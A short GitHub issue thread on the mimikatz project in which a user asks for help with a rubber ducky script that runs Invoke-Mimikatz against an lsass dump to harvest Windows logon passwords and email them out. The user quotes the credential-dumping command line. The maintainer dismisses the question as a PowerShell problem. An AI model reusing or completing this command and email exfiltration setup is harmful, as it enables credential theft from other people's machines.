### ISSUE TITLE
Grabbing passwords, sending to email, email is empty

### ISSUE THREAD

**Issue by SpaceSorcerer** [gentilkiwi/mimikatz#113]
I am trying to grab passwords and send them to an email.  So far most of this works, other than the password collection part.  There is nothing in the email when sent. 

Some context;
Using a rubber ducky (arduino),
On Win 10 x64,
Avast Antivirus in installed, but inactivated.

I am using this:   "$Body = Invoke-Mimikatz -Command '\"sekurlsa::minidump lsass_612.dmp\" \"sekurlsa::logonPasswords\"'"
to invoke mimikatz.

Then Keyboard.print("$ReportEmail.Body = ($Body)");
To set the content of the email.

The rest of the script works for emailing, not sure whats happening.

Obviously I'm doing something wrong.  Any ideas?

**Comment by gentilkiwi** [comment]
Hmm, maybe you can work on your PowerShell script ?
It's not mimikatz related...
